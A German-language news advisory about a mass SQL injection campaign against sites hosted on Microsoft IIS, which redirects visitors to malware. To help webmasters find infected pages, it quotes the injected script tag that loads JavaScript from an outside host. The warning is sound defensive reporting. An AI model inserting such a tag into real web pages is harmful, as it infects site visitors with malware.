Hunderttausende Webseiten infiziert: Auch normale Surfer in Gefahr

Über eine Sicherheitslücke in dem Microsoft Webserver IIS, dem Internet Information Server, versuchen Hacker aktuell, verschiedene Webseiten in großem Umfang zu manipulieren. Mit dem dort eingeschleusten Code soll gefährliche Malware unentdeckt auf die Computer der Surfer geladen werden.

Nach Angaben der Panda Security Labore wurden bereits 282.000 Webseiten entdeckt, die von diesem Angriff betroffen sind. Mit einer Google-Suche werden direkt 277.000 Webseiten mit dem gefährlichen Javascript gefunden, im deutschsprachigen Bereich sind 571 Seiten betroffen.

Die Schwachstelle in dem Webserver wird genutzt, um einen schädlichen SQL Code in alle auf dem Server gespeicherten Webseiten zu schleusen. So werden Besucher von legalen Seiten auf schädliche Seiten umgeleitet. Dort findet eine Überprüfung des User-PCs nach Schwachstellen, die zum Einschleusen von Schädlingen aller Art genutzt werden können, statt.

Alle Webmaster, deren Internetseiten auf einem Internet Information Server gehostet sind, sollten so schnell wie möglich prüfen, ob die eigene Webseite von diesem Angriff betroffen sind. Manipulierte Webseiten enthalten in ihrem Quellcode folgenden HTML Code, der ein externes Javascript lädt und mit einem IFRAME Tag verbunden ist:

<script src=http://www.nihaorr1.com/1.js>

Wenn er tatsächlich im Quellcode auftaucht, sollte er sofort gelöscht und der verantwortliche Administrator des entsprechenden Servers in Kenntnis gesetzt werden, damit dieser die nötigen Sicherheitsmaßnahmen treffen und alle anderen Webmaster ebenfalls warnen kann.

Angesichts der Menge der betroffenen Webseiten, könnten schon zahlreiche Anwender mit verschiedenen Schädlingen infiziert worden sein. Panda Security empfiehlt allen Usern ihre Systeme mit dem Online-Scanner “Panda ActiveScan 2.0” kostenlos nach Malware zu scannen.